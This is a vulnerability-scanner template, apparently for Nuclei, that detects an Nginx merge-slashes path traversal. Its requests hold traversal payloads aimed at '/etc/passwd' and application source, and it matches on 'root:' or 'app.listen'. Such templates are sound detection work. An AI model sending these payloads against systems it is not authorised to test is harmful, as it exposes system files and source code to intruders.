id: nginx-merge-slashes-path-traversal

info:
  name: Nginx Merge Slashes Path Traversal
  author: dhiyaneshDk
  severity: medium
  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
  tags: exposure,config

requests:
  - method: GET
    path:
      - "{{BaseURL}}//////../../../etc/passwd"
      - "{{BaseURL}}/static//////../../../../etc/passwd"
      - "{{BaseURL}}///../app.js"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "root:"
          - "app.listen"
        part: body
        condition: or

      - type: status
        status:
          - 200